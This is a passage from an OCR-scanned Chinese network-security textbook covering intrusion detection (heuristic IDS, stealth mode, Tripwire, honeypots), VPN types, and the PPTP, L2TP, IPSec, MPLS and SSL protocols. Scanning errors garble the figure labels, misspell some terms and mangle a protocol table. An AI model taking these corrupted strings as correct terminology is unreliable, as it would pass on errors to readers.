则 尝试 将 当前 的 活动 与 不 可 接受 活动 的 模式 进行 比较 , 当 两 者 相似 时 , 则 发 出 警告 。 另 一 
种 是 入 侵 检测 根据 已 知 不 良 活动 模型 开始 工作 。 例 如 , 除 使 用 少量 的 系统 功能 (注册 、 修 
改口 令 、 创 建 用 户 ) 之 外 ,任何 其 他 访问 口令 文件 的 企图 都 是 可 疑 的 。 在 这 种 入 侵 检测 方 
式 中 ,会 将 实际 的 活动 与 已 知 的 可 疑 范 围 进 行 比较 。 

所 有 的 启发 式 人 侵 检 测 都 将 行为 归纳 为 以 下 三 类 : 好 的 /良好 的 、 可 疑 的 和 未 知 的 。 
随 着 时 间 的 推移 ,IDS 会 逐步 学 习 某 种 行为 是 否 可 接受 。 根 据 学 习 的 结果 ,特定 的 行为 可 
以 从 一 种 类 型 转换 成 另 一 种 类 型 。 

与 模式 匹配 一 样 ,启发 式 人 侵 检 测 受 到 以 下 限制 : 系统 所 能 见 到 的 信息 量 非 常 大 (如 
何 将 行为 正确 归 类 ) ; 当前 行为 与 某 一 类 型 的 匹配 程度 如 何 。 
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3. 秘密 模式 

IDS 是 一 种 网 络 设 备 (在 基于 主机 的 IDS 中 ,是 运行 在 网 络 设备 上 的 一 个 程序 ) 。 面 
对 网 络 攻击 ,任何 一 种 网 络 设备 都 有 其 潜在 的 弱点 。 如 果 IDS 自身 被 拒绝 服务 攻击 所 淹 
没 , 它 还 会 有 用 吗 ? 如 果 攻 击 者 成 功 登 录 被 保护 网 络 中 的 系统 ,难道 他 下 一 步 不 会 设法 禁 
止 IDS 吗 ? 

为 解决 这 些 问题 ,大 多 数 IDS 都 运行 在 秘密 模式 (Stealth Mode) 下 ,所 以 ,IDS 有 两 
个 网 络 接口 : 一 个 用 于 正在 被 监视 的 网 络 或 网 段 , 另 一 个 用 于 产生 报警 和 其 他 可 能 的 管 
理 需 求 。IDS 把 被 监视 的 接口 仅 作为 输入 使 用 , 决 不 通过 此 接口 往外 发 送 包 。 通 常 ,为 这 
个 设备 的 该 接口 配置 不 公开 的 地 址 。 这 样 ,路 由 器 不 能 直接 路 由 任何 信息 到 这 个 地 址 , 因 
为 路 由 器 不 知道 有 这 个 设备 的 存在 。 这 是 完美 的 被 动 窃听 ! 如 果 IDS 需要 产生 一 个 警 
报 , 它 只 在 完全 隔离 的 控制 网 络 上 使 用 警报 接口 即 可 ,这 种 结构 如 图 7-21 所 示 。 


人 可 报 网络 


3Y 入 侵 检测 系统 


dr 


防火 墙 


服务 器 服务 器 服务 器 
图 7-21 与 两 个 网 络 相连 的 秘密 模式 IDS 


4. 其 他 IDS 类 型 

一 些 安 全 工程 师 也 在 考虑 使 用 其 他 设备 作为 IDS。 例 如 ,要 检测 不 可 接受 的 修改 代 
码 的 行为 ,通过 程序 来 比较 软件 代码 的 活动 版 本 和 代码 摘要 的 存储 版 本 就 能 够 实现 。 
Tripwire 程序 是 最 著名 的 软件 (或 静态 数据 ) 比较 程序 。 你 可 以 在 一 个 新 系统 上 运行 
Tripwire, 它 会 为 每 一 个 文件 产生 一 个 哈 希 值 , 然 后 可 以 在 一 个 安全 的 地 方 存储 这 些 哈 希 
值 (离线 存储 ,以 便 在 修改 一 个 系统 文件 时 没有 入 侵 者 能 修改 它们 )。 如 果 后 来 怀疑 系统 
遭 到 了 破坏 ,重新 运行 Tripwire, 并 提供 已 存储 的 哈 希 值 。Tripwire 会 重新 计算 这 些 哈 希 
值 并 对 任何 不 匹配 的 情况 进行 报告 ,这些 不 匹配 情况 能 指出 被 修改 的 文件 。 

系统 弱点 扫描 器 (如 ISS Scanner 或 Nessus) 可 以 针对 网 络 运行 ,它们 能 够 检测 已 知 
的 弱点 并 报告 所 发 现 的 缺陷 。 

蜜 缸 是 一 种 故意 诱惑 攻击 者 的 人 为 环境 。 它 可 以 记录 入 侵 者 的 行为 ,甚至 试图 通过 
对 行为 \ 包 数据 或 者 连接 的 跟踪 来 努力 识别 攻击 者 。 从 这 种 意义 上 来 说 , 蜜 缸 可 以 看 做 是 
一 种 IDS。 
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7.4 虚拟 专用 网 


防火 墙 可 以 对 进出 网 络 的 信息 和 行为 进行 控制 ,将 用 户 内 部 可 信任 网 络 和 外 部 不 可 
信任 网 络 隔 离 。 然 而 越 来 越 多 的 企业 在 全 国 乃 至 世界 各 地 建立 分 支 机 构 开 展业 务 。 随 着 
办 公 场 地 和 分 支 机 构 的 分 散 化 ,以 及 日 渐 庞大 的 移动 办 公 大 军 的 出 现 , 分 散在 不 同 地 点 的 
机 构 ,也 需要 考虑 安全 传输 的 问题 。 虚 拟 专 用 网 (Virtual Private Network,VPN) 技 术 应 
运 而 生 , 既 可 以 实现 企业 网 络 的 全 球 化 ,又 能 最 大 限度 地 利用 公共 资源 。VPN 技术 的 核 
心 是 在 互联 网 上 实现 保密 通信 。 
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1. 什么 是 VPN 

随 着 企业 自身 的 不 断 发 展 和 规模 的 扩大 , 越 来 越 多 的 企业 开始 在 不 同 的 地 方 设立 分 
支 机 构 , 以 拓展 业务 ,如 图 7-22 所 示 。 这 些 机 构 相 互 之 间 如 何 通过 Internet 传输 机 密 信 
息 ? 当 员 工 出 差 在 外 时 ,如 何 通 过 Internet 访问 公司 内 部 网 络 的 保密 数据 , 且 保 证 数据 在 
传输 过 程 中 不 被 窃听 、 算 改 或 丢失 呢 ? 


图 7-22 典型 企业 应 用 场景 


一 种 方法 是 建立 自己 的 专用 网 ,将 不 同 地 区 各 个 局 域 网 之 间 通 过 模拟 或 数字 专线 连 
接 。 但 是 架设 专线 非常 昂贵 ,还 需要 拥有 路 权 ,才能 开 挖 道路 、 铺 设 通信 电缆 或 光缆 ,这 对 
绝 大 多 数 企 业 并 不 现实 。 

另 一 种 方法 是 通过 隧道 技术 在 公共 网 络 上 仿真 一 条 点 到 点 的 专线 ,从 而 达到 信息 安 
全 传输 的 目的 ,这 就 是 VPN。VPN 技术 采用 了 认证 , 存 取 控制 .机密 性 数据 完整 性 等 措 
施 ,以 保证 信息 在 传输 中 不 被 窃听 、 算 改 复制。 典型 的 VPN 组 成 如 图 7-23 所 示 ,其 中 ， 

。 VPN 客户 机 : 可 以 是 终端 计算 机 ,也 可 以 是 路 由 器 。 

。 VPN 服务 器 : 接受 来 自 VPN 客户 机 的 连接 请 求 。 
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。 隧 道 : VPN 客户 机 和 服务 器 间 的 数据 传输 通道 ,在 其 中 传输 的 数据 必须 经 过 
封装 。 
。 VPN 连接 : 在 VPN 连接 中 ,数据 必须 经 过 加 密 。 


打印 文件 共享 主机 访问 数据 库 电子 邮件 和 
| 日 程 安排 | 
内 部 网 络 
VPN 连 接 2 
RS = 
> 
VPN 客 户 机 


图 7-23 ”VPN 的 构成 


这 样 ,VPN 客户 机 通过 本 地 网 络 服务 器 提供 者 ISP 连接 Internet, 并 通过 企业 内 部 
VPN 服务 器 认证 后 ,可 以 建立 一 条 跨越 Internet 的 安全 连接 ,实现 与 其 他 地 区 企业 内 部 
网 络 之 间 的 安全 通信 。 

2. VPN 的 功能 

VPN 的 主要 作用 是 要 保证 信息 在 传输 中 不 被 窃听 、 算 改 、 复 制 ,其 功能 主要 包括 : 

(1) 数据 封装 。VPN 技术 提供 带 寻 址 报头 的 数据 封装 机 制 。 

(2) 认证 。VPN 可 以 提供 VPN 服务 器 对 VPN 客户 机 的 单 向 认证 ,以 及 双向 认证 。 

(3) 数据 完整 性 。 检 查 数据 来 源 ,以 及 传输 过 程 中 是 否 被 筑 改 。 

(4) 数据 加 密 。 加 解密 过 程 要求 发 送 方 和 接收 方 共享 密 钥 。 

3. VPN 关键 技术 

为 了 满足 VPN 的 功能 要 求 ,VPN 需要 使 用 各 种 安全 技术 ,其 核心 的 关键 技术 包括 隧 
道 技术 、 密 码 技术 和 服务 质量 保证 技术 (QoS) 。 

(1) VPN 的 隧道 技术 。VPN 技术 可 以 在 多 个 层次 上 实现 ,其 核心 是 采用 隧道 技术 ， 
在 公共 网 络 中 将 用 户 的 数据 封装 在 隧道 里 进行 传输 。 所 谓 隧道 ,实际 上 是 一 种 数据 封装 
技术 ,将 一 种 协议 封装 在 另 一 种 协议 中 传输 ,实现 被 封装 协议 对 封装 协议 的 透明 性 ,从 而 
可 以 传输 不 同 网 络 层 协议 的 数据 包 . 实 现 各 种 形式 的 接 入 ,如 拨号 、Cable Modem、xDSL、 
ISDN 、 专 线 , 甚 至 无 线 接 入 等 。 

互联 网 上 最 常见 的 隧道 协议 主要 有 第 二 层 隧 道 协 议和 第 三 层 隧道 协议 ,区 别 主要 在 
与 用 户 数据 在 网 络 协议 栈 的 第 几 层 被 封装 。 表 7-5 列 出 了 各 种 常见 VPN 技术 所 属 的 
层次 。 
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表 7-5 VPN 技术 的 实现 层次 


ISO/OSI 参考 模型 VPN 协议 TCP/IP 参考 模型 
会 话 层 SOCKS v5 
传输 层 SSL 传输 层 
网 络 层 IPSec, MPLS,GRE 网 络 层 
数据 链 路 层 PPTPLZTIP 数据 链 路 层 


(2) VPN 的 密码 技术 。VPN 中 传输 的 数据 应 满足 机 密 性 、 完 整 性 、 可 认证 性 和 不 可 
否认 性 等 安全 要 求 ,涉及 加 密 、 身 份 认证 、 密 钥 交 换 、 密 钥 管 理 等 密码 技术 。 在 隧道 技术 和 
密码 技术 的 基础 上 , 便 能 够 建立 起 一 个 具有 安全 性 、 互 操作 性 的 VPN。 

4. VPN 与 防火 墙 

防火 墙 能 够 在 可 信任 的 内 部 网 络 和 不 可 信任 的 外 部 网 络 之 间架 构 一 道 安全 屏障 ,只 
允许 被 授权 的 用 户 或 是 数据 通过 ,而 非法 数据 会 被 拒 之 门 外 。 而 VPN 则 能 够 在 不 安全 
的 互联 网 上 建立 起 一 个 虚拟 的 专用 通道 ,保证 远程 访问 时 机 密 数 据 的 安全 。 目 前 许多 防 
火 墙 都 集成 了 VPN 的 功能 , 称 为 VPN 防火 墙 ,如 图 7-24 所 示 。VPN 防火 墙 结合 了 二 者 
的 优点 ,能 够 阻止 恶意 企图 ,保证 只 有 认证 数据 流 才能 达到 VPN。 
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图 7-24 VPN 与 防火 墙 的 部 署 


WIE 
避 


Nn 


VPN 和 防火 墙 也 可 以 单独 部 署 ,二 者 的 位 置 关系 需要 根据 安全 需求 和 网 络 结构 的 不 
同 而 采取 不 同 的 设计 。 通 常 防 火 墙 作为 第 一 道 防线 位 于 最 前 端 ,将 VPN 网 关 部 署 在 防 
火 墙 之 后 的 DMZ 非 军事 区 。 防 火 墙 阻止 所 有 来 历 不 明 的 数据 包 , 通 过 了 防火 墙 安全 策 
略 的 检查 的 数据 包 才 能 进入 VPN 隧道 ,VPN 网 关 还 会 根据 安全 策略 进一步 过 滤 。 


742 VPN 的 类 型 


VPN 对 物理 网 施加 逻辑 网 技术 ,利用 互联 网 的 公共 网 络 基 础 设施 ,使 用 安全 通信 技 
术 把 互联 网 上 两 个 专用 网 连接 起 来 ,提供 安全 的 网 络 互联 服务 。 

根据 VPN 隧道 封装 协议 及 隧道 协议 所 在 网 络 层次 的 不 同 ,VPN 技术 可 以 分 为 3 类: 

(1) 第 二 层 VPN 技术 : 使 用 L2F/L2TP、PPTP 等 协议 在 TCP/IP 协议 栈 链 路 层 实 
现 的 VPN 技术 。 
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(2) 第 三 层 VPN 技术 : 通过 IPSec、GRE 等 协议 在 TCP/IP 协议 本 网 络 层 实现 的 
VPN 技术 。 

(3) 其 他 VPN 技术 : 例如 使 用 介 于 二 三 层 之 间 的 MPLS 隧道 协议 实现 的 VPN 系 
统 ,基于 SOCKS v5 VPN, 基 于 传输 层 SSL 协议 实现 的 VPN 等 。 

根据 VPN 的 基本 实现 方式 可 将 其 分 为 以 下 3 个 类 型 : 

(1) Host-to-Host VPN: 连接 两 个 主机 ; 

(2) Host-to-Site VPN: 连接 一 个 主机 与 一 个 网 络 ,又 称 为 远程 访问 虚拟 专用 网 
(Remote Access VPN) ,可 以 实现 分 支 机 构 、 外 地 出 差 员工 等 的 安全 的 远程 访问 ; 

(3) Site-to-Site VPN: 连接 两 个 网 络 , 既 可 以 用 于 组 建 企业 各 个 分 支 机 构 之 间 的 安 
全 的 内 联网 , 即 内 联网 VPN(Intranet VPN); 也 可 用 于 组 建 企业 与 其 他 相关 业务 单位 、 合 
作 伙 伴 之 间 的 外 联网 , 即 外 联网 VPN(Extranet VPN)。 

1. 远程 访问 VPN 

远程 访问 VPN 可 以 为 远程 办 公 或 在 家 办 公 的 员工 ,建立 安全 的 通信 和 链 路 ,访问 企业 
内 部 网 络 的 资源 ,如 图 7-25。 和 远程 用 户 首先 通过 其 当地 的 ISP 连接 到 Internet, 然 后 再 使 
用 VPN 客户 端 通过 Internet 访问 企业 内 部 局 域 网 ,通过 企业 VPN 网 关 的 身份 认证 后 ， 
便 通过 公 网 与 企业 内 部 的 VPN 网 关 之 间 建立 了 一 个 隧道 ,这 个 隧道 实现 对 数据 的 加 密 
传输 。 远 程 访问 VPN 的 核心 技术 是 第 二 层 隧道 技术 。 
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图 7-25 远程 访问 虚拟 专用 网 


2. Host-to-Host VPN 

在 两 个 主机 之 间 建 立 VPN 隧道 ,保证 主机 到 主机 的 安全 数据 传输 ,有 时 也 被 称 为 远 
程 访问 VPN。 在 数据 传输 之 前 ,两 个 主机 之 间 需 要 进行 认证 与 密 钥 交换 ,然后 建立 VPN 
隧道 ,保证 数据 的 真实 性 、 完 整 性 和 机 密 性 ,如 图 7-26 所 示 。 此 类 型 的 连接 ,允许 员工 或 
合伙 人 安全 的 访问 一 个 特定 的 网 络 资源 (如 服务 器 /数据 库 ) ,但 可 能 不 允许 访问 网 络 内 的 
其 他 资源 。 

3. Site-to-Site VPN 

车 要 进行 企业 内 部 各 分 支 机 构 之 间 的 互联 ,或 者 企业 的 合作 者 之 间 互 联 , 采 用 Site- 
to-Site VPN 是 很 好 的 方式 。 这 种 类 型 的 VPN 隧道 是 在 两 个 网 络 的 VPN 网 关 之 间 构 建 
的 ,如 图 7-27 所 示 。 两 个 局 域 网 分 别 设置 了 VPN 服务 器 ,VPN 服务 器 之 间 形 成 信息 传 
输 隧 道 ,进行 用 户 身份 认证 和 数据 加 密 。 

Site-to-Site VPN 主要 使 用 IPSec 协议 来 建立 加 密 传输 数据 的 隧道 。 采 用 Site-to- 
Site VPN 能 使 用 灵活 的 拓扑 结构 ,包括 全 网 络 连接 ;能 够 更 快 更 容易 的 连接 新 的 站 点 。 

在 企业 各 个 分 支 机 构 之 间 建 立 的 虚拟 专用 网 , 称 为 内 联网 VPN(Intranet VPN)。 在 


图 7-26 Host-to-Host VPN 


图 7-27 Site-to-Site VPN 
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企业 与 其 相关 业务 单位 、 合 作 伙伴 之 间 建 立 的 虚拟 专用 网 , 称 为 外 联网 VPN (Extranet 
VPN) ,例如 为 合作 伙伴 的 员工 指定 特定 的 许可 权 , 人 允许 对 方 一 定 级 别 的 管理 人 员 访 问 一 
个 受 保护 的 服务 器 上 的 资源 ,同时 不 能 访问 其 他 资源 。 外 联网 VPN 并 不 假定 连接 的 不 
同 企业 之 间 存 在 双向 信任 关系 ,外 联网 VPN 应 采用 更 高 强度 的 加 密 算法 ,支持 多 种 认证 
方案 ,并 考虑 不 同 网 络 结构 和 操作 平台 之 间 的 互 操 作 性 。 

实现 不 同类 型 的 VPN 所 基于 的 协议 如 表 7-6 所 示 。 


表 7-6 不 同类 型 VPN 的 实现 


Site-to-Site VPN 远程 访问 VPN Site-to-Site VPN 远程 访问 VPN 
Cisco 
IPSec PPTP MPLS 2 
GRE 或 IP 隧道 L2TPv3 SSL 
743 VPN 协议 


1. 数据 链 路 层 VPN 协议 
数据 链 路 层 VPN 协议 包括 点 对 点 隧道 协议 (Point-to-Point Tunneling Protocol， 
PPTP) 、L2F 协议 和 第 二 层 隧 道 协 议 (Layer 2 Tunneling Protocol,L2TP) 等 ,通常 用 于 支 
持 拨号 用 户 远程 接 入 企业 或 机 构 的 内 部 VPN 服务 器 。 
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1) 点 对 点 隧道 协议 

点 对 点 隧道 协议 PPTP 由 微软 公司 设计 ,是 一 种 支持 多 协议 虚拟 专用 网 的 网 络 技术 ， 
工作 在 OSI 模型 的 第 二 层 。PPTP 协议 定义 了 一 种 PPP( 点 对 点 协议 ) 分 组 封装 机 制 , 令 
PPP 帧 可 以 通过 IP 网 络 封 装 发 送 。PPP 协议 为 在 点 对 点 连接 上 传输 多 协议 数据 包 提供 
了 一 种 标准 方法 ,支持 身份 验证 ,加 密 和 IP 地址 动态 分 配 服务 等 。 PPTP 协议 将 PPP 帧 
封装 进 IP 数据 报 中 ,通过 IP 网 络 ( 如 互联 网 或 其 他 企业 专用 内 联网 ) 传 输 , 如 图 7-28 
所 示 。 


使 用 PPTP 的 
VPN 客 户 端 


图 7-28 PPTP 隧道 


PPTP 协议 通过 使 用 扩展 的 通用 路 由 封装 协议 (Generic Routing Encapsulation， 
GRE) 进 行 封 装 , 可 以 加 密 并 /或 压缩 封装 的 PPP 帧 的 负载 。 有 关 GRE 详细 文档 可 参见 
RFC 1701 和 RFC 1702, 它 规定 了 怎样 用 一 种 网 络 层 协议 去 封装 另 一 种 网 络 层 协议 的 
方法 。 

PPTP 协议 数据 的 隧道 化 采用 多 层 封装 的 方法 : 初始 PPP 有 效 载荷 经 过 加 密 后 , 添 
加 PPP 报头 ,封装 形成 PPP 帧 ;PPP 帧 再 进一步 添加 GRE 报头 ,经 过 第 二 层 封装 形成 
GRE 报 文 ;第 三 层 封装 是 在 GRE 报头 外 在 添加 IP 报头 ,IP 报头 包含 数据 包 源 地 址 和 目 
的 地 址 ;最 后 进行 数据 链 路 层 封装 。PPTP 通过 TCP 控制 连接 来 创建 \ 维 护 和 终止 一 条 
隧道 。 

在 PPTP 协议 实现 的 过 程 中 ,使 用 的 认证 机 制 与 创建 PPP 连接 时 相同 ,主要 包括 : 

(1) CHAP(Challenge-Handshake Authentication Protocol, 询 问 握手 认证 协议 ) 。 

(2) MS-CHAP(Microsoft Challenge-Handshake Authentication Protocol ,微软 公司 
询问 握手 认证 协议 )。 

(3) EAP(Extensible Authentication Protocol, 扩 展 身份 认证 协议 )。 

(4) PAP(Password Authentication Protocol ,口令 认证 协议 ) 。 

PPTP 协议 支持 DES ,triple DES、RC4、RC5 等 常用 的 加 密 算法 。 

2) 第 二 层 隧 道 协议 

除 微软 公司 提出 的 PPTP 协议 之 外 ,另外 一 些 厂 家 也 做 了 许多 开发 工作 ,如 思科 公司 
开发 的 L2F(Layer2 Forwarding) 隧 道 协议 。 微 软 `. 思 科 、Ascend、3com、Bay 等 厂商 将 
L2F 和 PPTP 融合 ,共同 制定 了 第 二 层 隧 道 协议 L2TP. 并 发 布 为 标准 RFC 2661 。 

L2TP 采用 用 户 数据 报 协议 (UDP) 封 装 和 传送 PPP 帧 ,还 通过 UDP 消息 对 隧道 进 
行 维护 。PPP 帧 的 有 效 载荷 可 以 经 过 加 密 、 压 缩 或 两 者 的 混合 处 理 。 创 建 L2TP 隧道 时 
必须 使 用 与 PPP 连接 相同 的 认证 机 制 ,如 EAP、MS-CHAP、CHAP、SPAP 和 PAP 等 。 
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L2TP 主要 由 LAC(L2TP Access Concentrator, 接 人 集中 器 ) 和 LNS(L2TP Network 
Server, 网 络 服务 器 ) 组 成 。LAC 支持 客户 端的 L2TP, 用 于 发 起 呼叫 、 接 收 呼叫 和 建立 隧 
道 。LNS 是 所 有 隧道 的 终点 。 

PPTP 与 L2TP 最 大 的 优点 是 简单 易 行 ,对 于 微软 操作 系统 用 户 来 说 很 方便 。 它 们 
最 大 缺点 是 安全 强度 差 ,没有 强加 密 和 认证 支持 ,不 支持 外 联网 VPN。 

2. 网 络 层 VPN 协议 

TCP/IP 协议 的 网 络 层 实现 了 互联 网 上 任何 两 个 主机 之 间 的 点 对 点 通信 ,因此 在 第 
三 层 实现 VPN 技术 可 以 兼顾 用 户 的 透明 需求 和 技术 实现 的 简单 性 。 在 第 三 层 实现 的 
VPN 最 主要 .最 成 功 的 技术 就 是 基于 IPSec 体系 的 技术 。 

1) IPSec 协议 

IPSec 是 IETF IPSec 工作 组 为 了 在 IP 层 提供 通信 安全 而 制定 的 一 套 协议 得 ,是 一 
个 应 用 广泛 .开放 的 VPN 安全 协议 体系 。IPSec 安全 体系 结构 如 图 7-29 所 示 ,包含 如 下 
4 个 主要 部 分 : 

(1) 安全 协议 : 认证 首部 (Authentication Header, AH) 和 封装 安全 载荷 
(Encapsulation Security Payload,ESP) 。 

(2) 安全 关联 (Security Associations,SA) 。 

(3) 密 钥 管理 协议 : 手动 和 自动 IKE。 

(4) 密码 算法 : 加 密 算法 、. 认 证 算法 。 


IPSec 体系 
时 装 安全 载荷 (ESP) 认证 首部 (AH) 
| | 
加 密 算法 认证 算法 
(DES,3DES,AES) (MD5,SH-1) 
解释 域 (DOD 一 一 一 一 - 
密 钥 管理 


图 7-29 IPSec 安全 体系 结构 


IPSec 可 以 设置 成 在 两 种 不 同 操作 模式 下 运行 : 隧道 模式 (Tunnel Mode) ,传输 模式 
(CTransport Mode) 。 传 输 模式 适合 点 到 点 的 连接 , 即 主机 与 主机 之 间 的 VPN 可 以 采用 
此 模式 ,其 数据 分 组 中 原始 IP 包 首部 保留 不 动 ,在 后 面 插入 AH 认证 首部 或 ESP 的 首部 
和 尾部 , 仅 对 数据 净 荷 进行 加 密 和 认证 ,网 络 中 的 寻 址 根据 原始 IP 地 址 进行 。 隧 道 模 式 
适用 于 VPN 安全 网 关 之 间 的 连接 ,将 IPv4 数据 包 整体 加 密封 装 , 再 在 前 面 加 入 一 个 新 
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的 IP 包 首部 ,用 新 的 IP 地 址 将 数据 分 组 路 由 到 接收 端 。 

(1) 认证 首部 (Authentication Header, AH)。 

IP 数据 包 的 完整 性 仅 由 IP 首部 中 的 校 验 和 来 保证 ,缺乏 安全 性 。AH 协议 使 用 消 
息 认证 码 , 如 HMAC, 对 IP 进行 认证 ,提供 了 更 强 的 数据 完整 性 保护 ,以 及 数据 源 认 证 和 
防 重 放 攻击 。 但 AH 不 提供 加 密 功 能 ,数据 以 明文 传输 。 

AH 由 5 个 固定 长 度 域 和 1 个 变 长 的 认证 数据 域 组 成 ,如 图 7-30 所 示 。 其 中 ICV 是 
AH 或 ESP 用 来 验证 IP 数据 包 完 整 性 所 用 的 校 验 数据 ,AH 的 IP 协议 号 是 51 。 


IP TCP TCP 载荷 
下 一 首部 载荷 长 度 保留 字段 
SPIL: 安 全 参数 索引 
序列 号 


认证 数据 ICV( 变 长 域 ) 


图 7-30 认证 首部 格式 


AH 首部 在 不 同 操作 模式 下 的 格式 如 图 7-31 所 示 。 


原始 报 文 : IP 首 部 数据 
传输 模式 : IP 首 部 | AH 首部 数据 
认证 | 
隧道 模式 :| 新 IP 首 部 | AH 首部 | ”IP 首 部 数据 
认证 


图 7-31 传输 模式 与 隧道 模式 下 的 AH 首部 


(2) 封装 安全 载荷 (Encapsulation Security Payload,ESP) 。 

ESP 协议 提供 数据 机 密 性 、 数 据 源 认证 、 抗 重 放 攻 击 和 有 限 的 数据 流 机 密 性 等 服务 。 
ESP 采用 对 称 密码 算法 来 加 密 数 据 包 ,使 用 消息 认证 码 MAC 提供 认证 服务 ,如 HMAC- 
MD5、HMAC-SHA-1、null 算法 等 。 

ESP 数据 包 由 4 个 固定 长 度 的 域 和 3 个 变 长 域 组 成 ,如 图 7-32 所 示 。 其 中 ESP 的 
IP 协议 号 为 50。 

ESP 首部 在 不 同 操作 模式 下 的 格式 如 图 7-33 所 示 。 
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[ ww j{ssp 首 部 | TcP | 载荷 1 EsP 尾 部 | EsP 认 证 数据 ] 
人 SPI: 安全 参数 索引 ) 
ESP 首 部 
序列 号 
有 效 载荷 -要 保护 的 数据 
( 变 长 域 ) 
| ESP 尾 部 
填充 项 (0-255 字 节 ) 填充 长 度 下 一 首部 
认证 数据 ICV( 变 长 域 ) } ESP 认 证 数据 


图 7-32 ”ESP 数据 包 格 式 


源 始 报 文 : [下 首 部 | 数据 
传输 模式 : | IP 首部 | ESP 首 部 | ”数据 |[ ESP 尾 部 | ESP 认 证 数据 
上 而 本 | 
认证 
隧道 模式 : | 新 IP 首部 | ESP 首 部 | IP 首 部 | 。 数据 。 | ESp 尾 部 | ESP 认 证 数据 
[| 
认证 


图 7-33 传输 模式 与 隧道 模式 下 的 ESP 首部 


ESP 和 AH 可 以 结合 使 用 。 

(3) Internet 密 钥 交换 (Internet Key Exchange,IKE) 。 

AH 和 ESP 协议 给 出 了 IPSec 数据 封装 格式 ,封装 过 程 中 要 用 到 各 种 安全 参数 ,包括 
算法 、 密 钥 等 。IPSec 的 密 钥 管理 体系 完成 这 些 参数 的 协商 和 管理 。IPSec 通过 安全 关联 
SA 来 描述 数据 封装 的 安全 参数 。IKE 则 用 于 在 IPSec 通信 双方 之 间 通 过 协商 建立 起 共 
享 安 全 参数 及 验证 过 程 的 密 钥 ,建立 安全 关联 。IKE 协议 的 核心 是 Diffie-Hellman 密 钥 
交换 ,详细 文档 可 参见 RFC 2409 。 

2) MPLS 

多 协议 标签 交换 (Multi Protocol Label Switching,MPLS) 是 一 种 用 于 快速 数据 包 交 
换 和 路 由 的 体系 , 它 独立 于 第 二 层 和 第 三 层 协议 ,能 够 管理 各 种 不 同形 式 的 通信 流 。 
MPLS 提供 了 一 种 将 IP 地 址 映射 为 简单 `. 具 有 固定 长 度 的 标签 的 机 制 , 可 用 于 不 同 的 数 
据 分 组 转发 和 交换 技术 。 

在 MPLS 中 ,数据 传输 发 生 在 标签 交换 路 径 (Label Switch Path,LSP) 上 。LSP 是 每 
一 个 沿 着 从 源 端 到 终端 的 路 径 上 的 结 点 的 标签 序列 。 将 数据 标记 交换 转发 数据 与 网 络 层 
的 IP 路 由 相 结合 ,可 以 加 快 数据 分 组 的 转发 速度 。 
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MPLS 标签 被 插入 到 第 二 层 包 首 部 和 第 三 层 IP 分 组 之 间 , 如 图 7-34 所 示 。MPLS 
标签 具体 包括 标签 ,服务 类 信息 、 堆 栈 底 、 存 活 时 间 TTL。IP 分 组 在 MPLS 路 由 器 间 转 
发 过 程 如 下 : MPLS 入 口 路 由 器 根据 目的 地 址 查找 路 由 表 , 找 到 其 下 一 跳 路 由 器 的 转发 
标签 ;将 该 IP 分 组 打上 标签 ,转发 给 下 一 跳 路 由 器 ;下 一 跳 路 由 器 查找 其 MPLS 标签 转 
发 表 ,替换 分 组 中 原 有 标签 后 ,继续 转发 ,路 由 器 不 再 根据 目的 地 址 查找 路 由 表 , 而 是 根据 
标签 查找 MPLS 标签 转发 表 , 选择 出 站 的 通路 ;最 终 达 到 出 口 路 由 器 ,标签 交换 过 程 


结束 。 
0 20 23 24 31 
标签 EXP| S TILCTime-To-Live)|32bit 
[2 首部 | MPLS 首 部 | IP 首 部 | 数据 | 


图 7-34 MPLS 标签 


MPLS VPN 是 指 采 用 MPLS 技术 在 IP 网 络 上 构建 企业 的 专 网 ,实现 跨 地 域 、 安 全 、 
高 效 而 可 靠 的 数据 、 语 音 和 图 像 等 多 业务 通信 ,为 用 户 提供 高 质量 的 数据 传输 服务 。 
MPLS VPN 的 组 成 如 图 7-35 所 示 。 


7-35 MPLS VPN 网 络 的 组 成 


其 中 ,用 户 网 络 边缘 路 由 器 CE(Custom Edge Router) 直 接 与 服务 提供 商 网 络 相 连 ， 
它 “ 感 知 " 不 到 VPN 的 存在 。 骨 干 网 边缘 路 由 器 PE(Provider Edge Router) 与 用 户 的 CE 
直接 相连 ,复制 VPN 业务 接 入 ,处 理 VPN-IPv4 路 由 ,是 MPLS 三 层 VPN 的 主要 实现 
者 。 骨干 网 核心 路 由 器 负责 快速 转发 数据 ,不 与 CE 直接 相连 。 

MPLS VPN 采用 标签 交换 ,一 个 标签 对 于 一 个 用 户 数 据 流 ,便于 隔离 用 户 间 的 数据 ， 
最 大 限度 的 优化 配置 网 络 资源 ,提供 高 可 用 性 和 高 可 靠 性 。 

3. 传输 层 VPN 协议 

为 了 保护 Web 通信 协议 HTTP/S-HTTP,Netscape 公司 开发 了 SSL(Secure Socket 
Layer) 协 议 。SSL 协议 是 基于 会 话 的 加 密 和 认证 的 Internet 协议 ,在 两 个 实体 (客户 和 服 
务 器 ) 之 间 提 供 了 一 个 安全 的 通道 。SSL 工作 在 传输 层 ,与 使 用 的 应 用 层 协议 无 关 。 

SSL 协议 由 SSL 记录 协议 和 SSL 握手 协议 两 部 分 组 成 。SSL 记录 协议 对 数据 进行 
加 密 、 解 密 和 认证 。SSL 握手 协议 建立 连接 会 话 状态 的 密码 参数 。SSL 协议 可 以 实现 服 
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务 器 认证 、 客 户 认证 (可 选 ) SSL 链 路 上 数据 的 完整 性 和 保密 性 。 


SSL VPN 即 指 采 用 SSL 协议 来 实现 远程 接 人 的 VPN 技术 。 目 前 SSL 协议 被 广泛 
内 置 于 各 种 浏览 器 中 ,使 用 SSL 协议 进行 认证 和 数据 加 密 的 SSL VPN 可 免 于 安装 客 
户 端 。 


7.5 无 线 网 络 安全 


751 无 线 网 络 安全 概述 


无 线 通 信 采 用 无 线 电 传 送 数 据 ,摆脱 了 长 久 以 来 对 有 线 通 信 线 路 的 依赖 和 束缚 ,彻底 
改变 了 人 类 进行 信息 交流 的 方式 。 但 是 由 于 无 线 通 信 网 络 传输 媒体 的 开放 性 、 无 线 终端 
的 移动 性 、 网 络 拓扑 结构 的 动态 性 ,以 及 无 线 终端 计算 能 力 和 存储 能 力 的 局 限 性 ,使 得 无 
线 网 络 比 有 线 网 络 面临 更 多 的 安全 威胁 。 

1. 无 线 网 络 划分 

无 线 网 络 根据 覆盖 范围 ,传输 速率 和 用 途 的 不 同 ,可 以 分 为 : 无 线 广域网 .无 线 城 域 
网 .无线 局 域 网 和 无 线 个 人 网 络 。 

(1) 无 线 广域网 (Wireless wide area network, WWAN): 主要 指 通过 移动 通信 卫星 
